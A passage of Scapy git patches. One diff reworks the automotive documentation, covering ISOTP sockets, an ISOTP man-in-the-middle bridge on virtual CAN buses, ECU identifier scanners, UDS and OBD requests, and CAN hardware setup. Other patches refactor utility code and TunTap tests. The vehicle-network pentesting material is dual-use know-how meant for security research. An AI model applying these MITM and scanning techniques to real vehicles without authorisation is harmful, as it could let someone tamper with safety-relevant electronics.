compatibility. Always use ``with`` for +socket creation. This ensures that ``ISOTPSoftSocket`` objects will get closed +properly. +Example:: with ISOTPSocket("vcan0", did=0x241, sid=0x641) as sock: sock.send(...) +ISOTPNativeSocket +^^^^^^^^^^^^^^^^^ +**Requires:** -ISOTP message -------------- +* Python3 +* Linux +* Hartkopp's Linux kernel module: ``https://github.com/hartkopp/can-isotp.git`` (merged into mainline Linux in 5.10) -Creating an ISOTP message:: +During pentests, the ISOTPNativeSockets has a better performance and +reliability, usually. If you are working on Linux, consider this implementation:: + conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': True} load_contrib('isotp') - ISOTP(src=0x241, dst=0x641, data=b"\x3eabc") - -Creating an ISOTP message with extended addressing:: - - ISOTP(src=0x241, dst=0x641, exdst=0x41, data=b"\x3eabc") + sock = ISOTPSocket("can0", sid=0x641, did=0x241) -Creating an ISOTP message with extended addressing:: +Since this implementation is using a standard Linux socket, all Scapy functions +like ``sniff, sr, sr1, bridge_and_sniff`` work out of the box. - ISOTP(src=0x241, dst=0x641, exdst=0x41, exsrc=0x41, data=b"\x3eabc") +ISOTPSoftSocket +^^^^^^^^^^^^^^^ -Create CAN-frames from an ISOTP message:: +ISOTPSoftSockets can use any CANSocket. This gives the flexibility to use all +python-can interfaces. Additionally, these sockets work on Python2 and Python3. +Usage on Linux with native CANSockets:: - ISOTP(src=0x241, dst=0x641, exdst=0x41, exsrc=0x55, data=b"\x3eabc" * 10).fragment() + conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} + load_contrib('isotp') + with ISOTPSocket("can0", sid=0x641, did=0x241) as sock: + sock.send(...) -Send ISOTP message over ISOTP socket:: +Usage with python-can CANSockets:: - isoTpSocket = ISOTPSocket('vcan0', sid=0x241, did=0x641) - isoTpMessage = ISOTP('Message') - isoTpSocket.send(isoTpMessage) + conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} + conf.contribs['CANSocket'] = {'use-python-can': True} + load_contrib('isotp') + with ISOTPSocket(CANSocket(bustype='socketcan', channel="can0"), sid=0x641, did=0x241) as sock: + sock.send(...) -Sniff ISOTP message:: +This second example allows the usage of any ``python_can.interface`` object. - isoTpSocket = ISOTPSocket('vcan0', sid=0x641, did=0x241) - packets = isoTpSocket.sniff(timeout=0.5) +**Attention:** The internal implementation of ISOTPSoftSockets requires a background +thread. In order to be able to close this thread properly, we suggest the use of +Pythons ``with`` statement. ISOTP MITM attack with bridge and sniff --------------------------------------- @@ -584,15 +876,6 @@ Set up two vcans on Linux terminal:: sudo ip link set dev vcan0 up sudo ip link set dev vcan1 up -Set up ISOTP: - -First make sure you installed an iso-tp kernel module. - -When the vcan core module is loaded with "sudo modprobe vcan" the iso-tp module can be loaded to the kernel. - -Therefore navigate to isotp directory, and load module with "sudo insmod ./net/can/can-isotp.ko". (Tested on Kernel 4.9.135-1-MANJARO) - -Detailed instructions you find in https://github.com/hartkopp/can-isotp. Import modules:: @@ -632,7 +915,7 @@ Create threads for sending packet and to bridge and sniff:: threadBridge = threading.Thread(target=bridge) threadSender = threading.Thread(target=sendPacketWithISOTPSocket) -Start threads are based on Linux kernel modules. The python-can project is used to support CAN and CANSockets on other systems, besides Linux. This guide explains the hardware setup on a BeagleBone Black. The BeagleBone Black was chosen because of its two CAN interfaces on the main processor. The presence of two CAN interfaces in one device gives the possibility of CAN MITM attacks and session hijacking. The Cannelloni framework turns a BeagleBone Black into a CAN-to-UDP interface, which gives you the freedom to run Scapy on a more powerful machine.:: +Start threads:: threadBridge.start() threadSender.start() @@ -646,61 +929,6 @@ Close sockets:: isoTpSocketVCan0.close() isoTpSocketVCan1.close() -An ISOTPSocket will not respect ``src, dst, exdst, exsrc`` of an ISOTP message object. - -ISOTP Sockets -============= - -Scapy provides two kinds of ISOTP Sockets. One implementation, the ISOTPNativeSocket -is using the Linux kernel module from Hartkopp. The other implementation, the ISOTPSoftSocket -is completely implemented in Python. This implementation can be used on Linux, -Windows, and OSX. - -ISOTPNativeSocket ------------------ - -**Requires:** - -* Python3 -* Linux -* Hartkopp's Linux kernel module: ``https://github.com/hartkopp/can-isotp.git`` - -During pentests, the ISOTPNativeSockets has a better performance and -reliability, usually. If you are working on Linux, consider this implementation:: - - conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': True} - load_contrib('isotp') - sock = ISOTPSocket("can0", sid=0x641, did=0x241) - -Since this implementation is using a standard Linux socket, all Scapy functions -like ``sniff, sr, sr1, bridge_and_sniff`` work out of the box. - -ISOTPSoftSocket ---------------- - -ISOTPSoftSockets can use any CANSocket. This gives the flexibility to use all -python-can interfaces. Additionally, these sockets work on Python2 and Python3. -Usage on Linux with native CANSockets:: - - conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} - load_contrib('isotp') - with ISOTPSocket("can0", sid=0x641, did=0x241) as sock: - sock.send(...) - -Usage with python-can CANSockets:: - - conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} - conf.contribs['CANSocket'] = {'use-python-can': True} - load_contrib('isotp') - with ISOTPSocket(CANSocket(bustype='socketcan', channel="can0"), sid=0x641, did=0x241) as sock: - sock.send(...) - -This second example allows the usage of any ``python_can.interface`` object. - -**Attention:** The internal implementation of ISOTPSoftSockets requires a background -thread. In order to be able to close this thread properly, we suggest the use of -Pythons ``with`` statement. - ISOTPScan and ISOTPScanner -------------------------- @@ -770,56 +998,6 @@ Interactive shell usage example:: < at 0x7f98f912e950>, < at 0x7f98f906c0d0>] -XCPScanner ---------------- - -The XCPScanner is a utility to find the CAN identifiers of ECUs that support XCP. - -Commandline usage example:: - - python -m scapy.tools.automotive.xcpscanner -h - Finds XCP slaves using the "GetSlaveId"-message(Broadcast) or the "Connect"-message. - - positional arguments: - channel Linux SocketCAN interface name, e.g.: vcan0 - - optional arguments: - -h, --help show this help message and exit - --start START, -s START - Start identifier CAN (in hex). - The scan will test ids between --start and --end (inclusive) - Default: 0x00 - --end END, -e END End identifier CAN (in hex). - The scan will test ids between --start and --end (inclusive) - Default: 0x7ff - --sniff_time', '-t' Duration in milliseconds a sniff is waiting for a response. - Default: 100 - --broadcast, -b Use Broadcast-message GetSlaveId instead of default "Connect" - (GetSlaveId is an optional Message that is not always implemented) - --verbose VERBOSE, -v - Display information during scan - - Examples: - python3.6 -m scapy.tools.automotive.xcpscanner can0 - python3.6 -m scapy.tools.automotive.xcpscanner can0 -b 500 - python3.6 -m scapy.tools.automotive.xcpscanner can0 -s 50 -e 100 - python3.6 -m scapy.tools.automotive.xcpscanner can0 -b 500 -v - - -Interactive shell usage example:: - >>> conf.contribs['CANSocket'] = {'use-python-can': False} - >>> load_layer("can") - >>> load_contrib("automotive.xcp.xcp") - >>> sock = CANSocket("vcan0") - >>> sock.basecls = XCPOnCAN - >>> scanner = XCPOnCANScanner(sock) - >>> result = scanner.start_scan() - -The result includes the slave_id (the identifier of the Ecu that receives XCP messages), -and the response_id (the identifier that the Ecu will send XCP messages to). - - - UDS === @@ -878,7 +1056,8 @@ Customization example:: UDS_RDBI.dataIdentifiers[0x172b] = 'GatewayIP' -If one wants to work with this custom additions, these can be loaded at runtime to the Scapy interpreter:: +If one wants to work with this custom additions, these can be loaded at runtime +to the Scapy interpreter:: >>> load_contrib('automotive.uds') >>> load_contrib('automotive.OEM-XYZ.car-model-xyz') @@ -904,6 +1083,7 @@ If one wants to work with this custom additions, these can be loaded at runtime GMLAN ===== + GMLAN is very similar to UDS. It's GMs application layer protocol for flashing, calibration and diagnostic of their cars. Use the argument ``basecls=GMLAN`` on the ``init`` function of an ISOTPSocket. @@ -922,7 +1102,10 @@ This utility depends heavily on the support of the used protocol. ``UDS`` is sup Log all commands applied to an Ecu ---------------------------------- -This example shows the logging mechanism of an Ecu object. The log of an Ecu is a dictionary of applied UDS commands. The key for this dictionary is the UDS service name. The value consists of a list of tuples, containing a timestamp and a log value +This example shows the logging mechanism of an Ecu object. The log of an Ecu +is a dictionary of applied UDS commands. The key for this dictionary is the +UDS service name. The value consists of a list of tuples, containing a timestamp +and a log value Usage example:: @@ -936,7 +1119,9 @@ Usage example:: Trace all commands applied to an Ecu ------------------------------------ -This example shows the trace mechanism of an Ecu object. Traces of the current state of the Ecu object and the received message are printed on stdout. Some messages, depending on the protocol, will change the internal state of the Ecu. +This example shows the trace mechanism of an Ecu object. Traces of the current +state of the Ecu object and the received message are printed on stdout. +Some messages, depending on the protocol, will change the internal state of the Ecu. Usage example:: @@ -965,7 +1150,10 @@ Usage example:: Analyze multiple UDS messages ----------------------------- -This example shows how to load ``UDS`` messages from a ``.pcap`` file containing ``CAN`` messages. A ``PcapReader`` object is used as socket and an ``ISOTPSession`` parses ``CAN`` frames to ``ISOTP`` frames which are then casted to ``UDS`` objects through the ``basecls`` parameter +This example shows how to load ``UDS`` messages from a ``.pcap`` file containing +``CAN`` messages. A ``PcapReader`` object is used as socket and an +``ISOTPSession`` parses ``CAN`` frames to ``ISOTP`` frames which are +then casted to ``UDS`` objects through the ``basecls`` parameter Usage example:: @@ -984,7 +1172,11 @@ Usage example:: Analyze on the fly with EcuSession ---------------------------------- -This example shows the usage of an EcuSession in sniff. An ISOTPSocket or any socket like object which returns entire messages of the right protocol can be used. An ``EcuSession`` is used as supersession in an ``ISOTPSession``. To obtain the ``Ecu`` object from an ``EcuSession``, the ``EcuSession`` has to be created outside of sniff. +This example shows the usage of an EcuSession in sniff. An ISOTPSocket or any +socket like object which returns entire messages of the right protocol can be +used. An ``EcuSession`` is used as supersession in an ``ISOTPSession``. +To obtain the ``Ecu`` object from an ``EcuSession``, the ``EcuSession`` +has to be created outside of sniff. Usage example:: @@ -1005,7 +1197,10 @@ SOME/IP and SOME/IP SD messages Creating a SOME/IP message -------------------------- -This example shows a SOME/IP message which requests a service 0x1234 with the method 0x421. Different types of SOME/IP messages follow the same procedure and their specifications can be seen here ``http://www.some-ip.com/papers/cache/AUTOSAR_TR_SomeIpExample_4.2.1.pdf``. +This example shows a SOME/IP message which requests a service 0x1234 with the +method 0x421. Different types of SOME/IP messages follow the same procedure +and their specifications can be seen here +``http://www.some-ip.com/papers/cache/AUTOSAR_TR_SomeIpExample_4.2.1.pdf``. Load the contribution:: @@ -1095,9 +1290,6 @@ Stack it and send it:: OBD === -OBD message ------------ - OBD is implemented on top of ISOTP. Use an ISOTPSocket for the communication with an Ecu. You should set the parameters ``basecls=OBD`` and ``padding=True`` in your ISOTPSocket init call. @@ -1120,8 +1312,9 @@ The response will contain a PacketListField, called `data_records`. This field c |###[ PID_00_PIDsSupported ]### | supported_pids= PID20+PID1F+PID1C+PID15+PID14+PID13+PID11+PID10+PID0F+PID0E+PID0D+PID0C+PID0B+PID0A+PID07+PID06+PID05+PID04+PID03+PID01 + Let's assume our Ecu under test supports the pid 0x15:: - + req = OBD()/OBD_S01(pid=[0x15]) resp = sock.sr1(req) resp.show() @@ -1146,7 +1339,7 @@ Service 08 supports Test Identifiers (tid). Service 09 supports Information Identifiers (iid). Examples: -^^^^^^^^^ +--------- Request supported Information Identifiers:: @@ -1174,234 +1367,6 @@ Request the Vehicle Identification Number (VIN):: Test-Setup Tutorials ==================== -Hardware Setup --------------- - -Beagle Bone Black Operating System Setup -^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - -#. | **Download an Image** - | The latest Debian Linux image can be found at the website - | ``https://beagleboard.org/latest-images``. Choose the BeagleBone - Black IoT version and download it. - - :: - - wget https://debian.beagleboard.org/images/bone-debian-8.7\ - -iot-armhf-2017-03-19-4gb.img.xz - - - After the download, copy it to an SD-Card with minimum of 4 GB storage. - - :: - - xzcat bone-debian-8.7-iot-armhf-2017-03-19-4gb.img.xz | \ - sudo dd of=/dev/xvdj - - -#. | **Enable WiFi** - | USB-WiFi dongles are well supported by Debian Linux. Login over SSH - on the BBB and add the WiFi network credentials to the file - ``/var/lib/connman/wifi.config``. If a USB-WiFi dongle is not - available, it is also possible to share the host's internet - connection with the Ethernet connection of the BBB emulated over - USB. A tutorial to share the host network connection can be found - on this page: - | ``https://elementztechblog.wordpress.com/2014/12/22/sharing-internet -using-network-over-usb-in-beaglebone-black/``. - | Login as root onto the BBB: - - :: - - ssh debian@192.168.7.2 - sudo su - - - Provide the WiFi login credentials to connman: - - :: - - echo "[service_home] - Type = wifi - Name = ssid - Security = wpa - Passphrase = xxxxxxxxxxxxx" \ - > /var/lib/connman/wifi.config - - - Restart the connman service: - - :: - - systemctl restart connman.service - - -Dual-CAN Setup -^^^^^^^^^^^^^^ - -#. | **Device tree setup** - | You'll need to follow this section only if you want to use two CAN - interfaces (DCAN0 and DCAN1). This will disable I2C2 from using pins - P9.19 and P9.20, which are needed by DCAN0. You only need to perform the - steps in this section once. - - | Warning: The configuration in this section will disable BBB capes from - working. Each cape has a small I2C EEPROM that stores info that the BBB - needs to know in order to communicate with the cape. Disable I2C2, and - the BBB has no way to talk to cape EEPROMs. Of course, if you don't use - capes then this is not a problem. - - | Acquire DTS sources that matches your kernel version. Go - `here `__ and switch over to the - branch that represents your kernel version. Download the entire branch - as a ZIP file. Extract it and do the following (version 4.1 shown as an - example): - - :: - - # cd ~/src/linux-4.1/arch/arm/boot/dts/include/ - # rm dt-bindings - # ln -s ../../../../../include/dt-bindings - # cd .. - Edit am335x-bone-common.dtsi and ensure the line with "//pinctrl-0 = <&i2c2_pins>;" is commented out. - Remove the complete &ocp section at the end of this file - # mv am335x-boneblack.dts am335x-boneblack.raw.dts - # cpp -nostdinc -I include -undef -x assembler-with-cpp am335x-boneblack.raw.dts > am335x-boneblack.dts - # dtc -W no-unit_address_vs_reg -O dtb -o am335x-boneblack.dtb -b 0 -@ am335x-boneblack.dts - # cp /boot/dtbs/am335x-boneblack.dtb /boot/dtbs/am335x-boneblack.orig.dtb - # cp am335x-boneblack.dtb /boot/dtbs/ - Reboot - -#. **Overlay setup** - | This section describes how to build the device overlays for the two CAN devices (DCAN0 and DCAN1). You only need to perform the steps in this section once. - | Acquire BBB cape overlays, in one of two ways… - - :: - - # apt-get install bb-cape-overlays - https://github.com/beagleboard/bb.org-overlays/ - - | Then do the following: - - - :: - - # cd ~/src/bb.org-overlays-master/src/arm - # ln -s ../../include - # mv BB-CAN1-00A0.dts BB-CAN1-00A0.raw.dts - # cp BB-CAN1-00A0.raw.dts BB-CAN0-00A0.raw.dts - Edit BB-CAN0-00A0.raw.dts and make relevant to CAN0. Example is shown below. - # cpp -nostdinc -I include -undef -x assembler-with-cpp BB-CAN0-00A0.raw.dts > BB-CAN0-00A0.dts - # cpp -nostdinc -I include -undef -x assembler-with-cpp BB-CAN1-00A0.raw.dts > BB-CAN1-00A0.dts - # dtc -W no-unit_address_vs_reg -O dtb -o BB-CAN0-00A0.dtbo -b 0 -@ BB-CAN0-00A0.dts - # dtc -W no-unit_address_vs_reg -O dtb -o BB-CAN1-00A0.dtbo -b 0 -@ BB-CAN1-00A0.dts - # cp *.dtbo /lib/firmware - - -#. | **CAN0 Example Overlay** - | Inside the DTS folder, create a file with the content of the - following listing. - - :: - - cd ~/bb.org-overlays/src/arm - cat < BB-CAN0-00A0.raw.dts - - /* - * Copyright (C) 2015 Robert Nelson - * - * Virtual cape for CAN0 on connector pins P9.19 P9.20 - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 as - * published by the Free Software Foundation. - */ - /dts-v1/; - /plugin/; - - #include - #include - - / { - compatible = "ti,beaglebone", "ti,beaglebone-black", "ti,beaglebone-green"; - - /* identification */ - part-number = "BB-CAN0"; - version = "00A0"; - - /* state the resources this cape uses */ - exclusive-use = - /* the pin header uses */ - "P9.19", /* can0_rx */ - "P9.20", /* can0_tx */ - /* the hardware ip uses */ - "dcan0"; - - fragment@0 { - target = <&am33xx_pinmux>; - __overlay__ { - bb_dcan0_pins: pinmux_dcan0_pins { - pinctrl-single,pins = < - BONE_P9_19 (PIN_INPUT_PULLUP | MUX_MODE2) /* uart1_txd.d_can0_rx */ - BONE_P9_20 (PIN_OUTPUT_PULLUP | MUX_MODE2) /* uart1_rxd.d_can0_tx */ - >; - }; - }; - }; - - fragment@1 { - target = <&dcan0>; - __overlay__ { - status = "okay"; - pinctrl-names = "default"; - pinctrl-0 = <&bb_dcan0_pins>; - }; - }; - }; - EOF - - -#. | **Test the Dual-CAN Setup** - | Do the following each time you need CAN, or automate these steps if you like. - - :: - - # echo BB-CAN0 > /sys/devices/platform/bone_capemgr/slots - # echo BB-CAN1 > /sys/devices/platform/bone_capemgr/slots - # modprobe can - # modprobe can-dev - # modprobe can-raw - # ip link set can0 up type can bitrate 50000 - # ip link set can1 up type can bitrate 50000 - - Check the output of the Capemanager if both CAN interfaces have been - loaded. - - :: - - cat /sys/devices/platform/bone_capemgr/slots - - 0: PF---- -1 - 1: PF---- -1 - 2: PF---- -1 - 3: PF---- -1 - 4: P-O-L- 0 Override Board Name,00A0,Override Manuf, BB-CAN0 - 5: P-O-L- 1 Override Board Name,00A0,Override Manuf, BB-CAN1 - - - If something went wrong, ``dmesg`` provides kernel messages to analyse the root of failure. - -#. | **References** - - - `embedded-things.com: Enable CANbus on the Beaglebone - Black `__ - - `electronics.stackexchange.com: Beaglebone Black CAN bus - Setup `__ - -#. | **Acknowledgment** - | Thanks to Tom Haramori. Parts of this section are copied from his guide: https://github.com/haramori/rhme3/blob/master/Preparation/BBB_CAN_setup.md - - - ISO-TP Kernel Module Installation --------------------------------- @@ -1410,16 +1375,16 @@ A Linux ISO-TP kernel module can be downloaded from this website: ``README.isotp`` in this repository provides all information and necessary steps for downloading and building this kernel module. The ISO-TP kernel module should also be added to the ``/etc/modules`` file, -to load this module automatically at system boot of the BBB. +to load this module automatically at system boot. CAN-Interface Setup ------------------- -As the final step to prepare the BBB's CAN interfaces for usage, these +As the final step to prepare CAN interfaces for usage, these interfaces have to be set up through some terminal commands. The bitrate can be chosen to fit the bitrate of a CAN bus under test. -:: +How-To:: ip link set can0 up type can bitrate 500000 ip link set can1 up type can bitrate 500000 @@ -1457,11 +1422,8 @@ To build a small test environment in which you can send SOME/IP messages to and -Software Setup --------------- - -Cannelloni Framework Installation -^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ +Cannelloni Framework +-------------------- The Cannelloni framework is a small application written in C++ to transfer CAN data over UDP. In this way, a researcher can map the CAN @@ -1473,7 +1435,7 @@ explains the installation and usage in detail. Cannelloni needs virtual CAN interfaces on the operator's machine. The next listing shows the setup of virtual CAN interfaces. -:: +How-To:: modprobe vcan From cadc0831f652a3ecb7e21bc9d3016e95b234da5f Mon Sep 17 00:00:00 2001 From: Pierre Lalet Date: Wed, 21 Apr 2021 08:23:52 +0200 Subject: [PATCH 0565/1632] utils.lhex(): fix unnecessary else after return, use isinstance() --- scapy/utils.py | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index 0d42c0b9a9b..a2c2515996e 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -257,14 +257,13 @@ def lhex(x): from scapy.volatile import VolatileValue if isinstance(x, VolatileValue): return repr(x) - if type(x) in six.integer_types: + if isinstance(x, six.integer_types): return hex(x) - elif isinstance(x, tuple): - return "(%s)" % ", ".join(map(lhex, x)) - elif isinstance(x, list): - return "[%s]" % ", ".join(map(lhex, x)) - else: - return str(x) + if isinstance(x, tuple): + return "(%s)" % ", ".join(lhex(v) for v in x) + if isinstance(x, list): + return "[%s]" % ", ".join(lhex(v) for v in x) + return str(x) @conf.commands.register From 11832deee0067e1db2660ff1f61e5d4e979adf27 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 24 Apr 2021 14:23:39 +0200 Subject: [PATCH 0566/1632] Travis cleanup / TunTap fixes / Mypy 3.9 (#3182) * Use 3.9 for Mypy * Improve tuntap tests - Fix --- .github/workflows/unittests.yml | 2 +- .travis.yml | 8 --- scapy/arch/__init__.py | 10 +++- scapy/arch/common.py | 2 +- scapy/arch/linux.py | 2 +- scapy/layers/tuntap.py | 6 ++- scapy/tools/UTscapy.py | 2 +- scapy/utils.py | 4 +- test/sendsniff.uts | 2 +- test/tuntap.uts | 95 +++++++++++++++++---------------- 10 files changed, 68 insertions(+), 65 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 8e04990832a..df525595fa8 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -49,7 +49,7 @@ jobs: - name: Setup Python uses: actions/setup-python@v2 with: - python-version: 3.8 + python-version: 3.9 - name: Install tox run: pip install tox - name: Run mypy diff --git a/.travis.yml b/.travis.yml index e47173a1b5b..433f41d9a14 100644 --- a/.travis.yml +++ b/.travis.yml @@ -14,14 +14,6 @@ jobs: env: - TOXENV=py38-isotp_kernel_module,codecov - # warnings/deprecations - - os: linux - python: 3.8 - env: - - SCAPY_PY_OPTS="-Werror -X tracemalloc" TOXENV=py38-linux_root - allow_failures: - - env: SCAPY_PY_OPTS="-Werror -X tracemalloc" TOXENV=py38-linux_root - install: - bash .config/ci/install.sh - python -c "from scapy.all import conf; print(repr(conf))" diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index 75f85c2cea7..0f0e6c5cec7 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -13,7 +13,13 @@ from scapy.compat import orb from scapy.config import conf, _set_conf_sockets from scapy.consts import LINUX, SOLARIS, WINDOWS, BSD -from scapy.data import ARPHDR_ETHER, ARPHDR_LOOPBACK, IPV6_ADDR_GLOBAL +from scapy.data import ( + ARPHDR_ETHER, + ARPHDR_LOOPBACK, + ARPHDR_PPP, + ARPHDR_TUN, + IPV6_ADDR_GLOBAL +) from scapy.error import Scapy_Exception from scapy.interfaces import NetworkInterface from scapy.pton_ntop import inet_pton, inet_ntop @@ -72,7 +78,7 @@ def get_if_hwaddr(iff): Returns the MAC (hardware) address of an interface """ addrfamily, mac = get_if_raw_hwaddr(iff) # type: ignore # noqa: F405 - if addrfamily in [ARPHDR_ETHER, ARPHDR_LOOPBACK]: + if addrfamily in [ARPHDR_ETHER, ARPHDR_LOOPBACK, ARPHDR_PPP, ARPHDR_TUN]: return str2mac(mac) else: raise Scapy_Exception("Unsupported address family (%i) for interface [%s]" % (addrfamily, iff)) # noqa: E501 diff --git a/scapy/arch/common.py b/scapy/arch/common.py index 958c59d0d87..b8155bdecec 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -83,7 +83,7 @@ def get_if_raw_hwaddr(iff, # type: Union[NetworkInterface, str] from scapy.arch import SIOCGIFHWADDR # type: ignore siocgifhwaddr = SIOCGIFHWADDR return struct.unpack( # type: ignore - "16xh6s8x", + "16xH6s8x", get_if(iff, siocgifhwaddr) ) diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 88f0de80167..9f7e69e5583 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -210,7 +210,7 @@ def get_alias_address(iface_name, # type: str # Extract interfaces names out = struct.unpack("iL", ifreq)[0] - names_b = names_ar.tobytes() if six.PY3 else names_ar.tostring() + names_b = names_ar.tobytes() if six.PY3 else names_ar.tostring() # type: ignore # noqa: E501 names = [names_b[i:i + offset].split(b'\0', 1)[0] for i in range(0, out, name_len)] # noqa: E501 # Look for the IP address diff --git a/scapy/layers/tuntap.py b/scapy/layers/tuntap.py index 1336a9671bc..a664980cfbe 100644 --- a/scapy/layers/tuntap.py +++ b/scapy/layers/tuntap.py @@ -186,7 +186,7 @@ def __init__(self, iface=None, mode_tun=None, default_read_size=MTU, flags = LINUX_IFF_TAP | LINUX_IFF_NO_PI tsetiff = raw(LinuxTunIfReq( - ifrn_name=bytes_encode(self.iface), + ifrn_name=self.iface, ifru_flags=flags)) ioctl(sock, LINUX_TUNSETIFF, tsetiff) @@ -226,6 +226,7 @@ def recv_raw(self, x=None): return r def send(self, x): + # type: (Packet) -> int if hasattr(x, "sent_time"): x.sent_time = time.time() @@ -240,8 +241,9 @@ def send(self, x): sx = raw(x) try: - self.outs.write(sx) + r = self.outs.write(sx) self.outs.flush() + return r except socket.error: log_runtime.error("%s send", self.__class__.__name__, exc_info=True) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 18e0165990a..85a217a3998 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -1079,7 +1079,7 @@ def main(): pass if conf.use_pcap: - KW_KO.append("not_pcapdnet") + KW_KO.append("not_libpcap") if VERB > 2: print(" " + arrow + " libpcap mode") diff --git a/scapy/utils.py b/scapy/utils.py index a2c2515996e..f56ade2b790 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1056,7 +1056,7 @@ def corrupt_bytes(data, p=0.01, n=None): n = max(1, int(s_len * p)) for i in random.sample(range(s_len), n): s[i] = (s[i] + random.randint(1, 255)) % 256 - return s.tostring() if six.PY2 else s.tobytes() + return s.tostring() if six.PY2 else s.tobytes() # type: ignore @conf.commands.register @@ -1072,7 +1072,7 @@ def corrupt_bits(data, p=0.01, n=None): n = max(1, int(s_len * p)) for i in random.sample(range(s_len), n): s[i // 8] ^= 1 << (i % 8) - return s.tostring() if six.PY2 else s.tobytes() + return s.tostring() if six.PY2 else s.tobytes() # type: ignore ############################# diff --git a/test/sendsniff.uts b/test/sendsniff.uts index 00a2952ee07..1e4ec53558c 100644 --- a/test/sendsniff.uts +++ b/test/sendsniff.uts @@ -114,7 +114,7 @@ else: ############ + Test bridge_and_sniff() using tun sockets -~ tun not_pcapdnet +~ tun not_libpcap = Create two tun interfaces diff --git a/test/tuntap.uts b/test/tuntap.uts index 7289831a914..1f9ea346eeb 100644 --- a/test/tuntap.uts +++ b/test/tuntap.uts @@ -4,7 +4,7 @@ ####### + Test Linux-specific protocol headers for TunTap -~ linux tun +~ linux tun not_libpcap = Linux-specific protocol headers @@ -26,7 +26,7 @@ assert isinstance(p.payload, IPv6) ####### + Test tun device -~ tun netaccess +~ tun netaccess not_libpcap = Create a tun interface @@ -47,32 +47,31 @@ elif BSD: else: raise NotImplementedError() +conf.ifaces.reload() +conf.route.resync() +conf.route6.resync() + = Setup ICMPEcho_am on the interface am = tun0.am(ICMPEcho_am, count=3) am.defoptsniff['timeout'] = 5 t_am = Thread(target=am) t_am.start() -time.sleep(1) = Send ping packets from OS into scapy -# ping returns non-zero exit code on 100% packet loss -assert subprocess.check_call(["ping", "-c3", "192.0.2.2"]) == 0 +send(IP(dst="192.0.2.2")/ICMP(seq=(1,3))) = Cleanup t_am.join(timeout=3) tun0.close() -if not conf.use_pypy: - # See https://pypy.readthedocs.io/en/latest/cpython_differences.html - del tun0 ####### + Test strip_packet_info=False on Linux -~ tun linux netaccess +~ tun linux netaccess not_libpcap = Create a tun interface @@ -88,17 +87,18 @@ assert subprocess.check_call([ "ip", "addr", "change", "192.0.2.1", "peer", "192.0.2.2", "dev", "tun0"]) == 0 -= Send ping packets from Linux into Scapy +conf.ifaces.reload() +conf.route.resync() +conf.route6.resync() -t = AsyncSniffer(opened_socket=tun0) -t.start() += Send ping packets from Linux into Scapy -# We expect this to return exit code 1, because there's nothing in Scapy that -# responds to these packets. -assert subprocess.call(["ping", "-c3", "192.0.2.2"]) == 1 +def cb(): + send(IP(dst="192.0.2.2")/ICMP(seq=(1,3))) -time.sleep(1) -t.stop() +t = AsyncSniffer(opened_socket=tun0, lfilter=lambda x: IP in x, started_callback=cb, count=3) +t.start() +t.join(timeout=3) assert len(t.results) >= 3 icmp4_sequences = set() @@ -118,13 +118,10 @@ assert len(icmp4_sequences) == 3 = Delete the tun interface tun0.close() -if not conf.use_pypy: - # See https://pypy.readthedocs.io/en/latest/cpython_differences.html - del tun0 + Test strip_packet_info=True and IPv6 -~ tun netaccess ipv6 +~ tun netaccess ipv6 not_libpcap = Create a tun interface with IPv4 + IPv6 @@ -149,19 +146,19 @@ elif BSD: else: raise NotImplementedError() -= Send ping packets from OS into Scapy +conf.ifaces.reload() +conf.route.resync() +conf.route6.resync() -t = AsyncSniffer(opened_socket=tun0) -t.start() += Send ping packets from OS into Scapy -# There's nothing in Scapy that responds, but we expect the packets to be sent -# successfully. Linux and BSD (incl. macOS) have different exit codes. -EXPECTED_EXIT = 1 if LINUX else 2 -assert subprocess.call(["ping", "-c3", "192.0.2.2"]) == EXPECTED_EXIT -assert subprocess.call(["ping6", "-c3", "2001:db8::2"]) == EXPECTED_EXIT +def cb(): + send(IP(dst="192.0.2.2")/ICMP(seq=(1,3))) + send(IPv6(dst="2001:db8::2")/ICMPv6EchoRequest(seq=(1,3))) -time.sleep(1) -t.stop() +t = AsyncSniffer(opened_socket=tun0, lfilter=lambda x: ICMP in x or ICMPv6EchoRequest in x, started_callback=cb, count=6) +t.start() +t.join(timeout=3) assert len(t.results) >= 6 icmp4_sequences = set() @@ -187,13 +184,10 @@ assert len(icmp6_sequences) == 3, ( = Delete the tun interface tun0.close() -if not conf.use_pypy: - # See https://pypy.readthedocs.io/en/latest/cpython_differences.html - del tun0 + Test tap interfaces -~ tap netaccess +~ tap netaccess not_libpcap = Create a tap interface with IPv4 @@ -215,18 +209,21 @@ else: assert subprocess.check_call([ "arp", "-s", "192.0.2.2", "20:00:00:20:00:00", "temp"]) == 0 +conf.ifaces.reload() +conf.route.resync() +conf.route6.resync() + = Send ping packets from OS into Scapy -t = AsyncSniffer(opened_socket=tap0) -t.start() +conf.ifaces +conf.route -# There's nothing in Scapy that responds, but we expect the packets to be sent -# successfully. Linux and BSD (incl. macOS) have different exit codes. -EXPECTED_EXIT = 1 if LINUX else 2 -assert subprocess.call(["ping", "-c3", "192.0.2.2"]) == EXPECTED_EXIT +def cb(): + 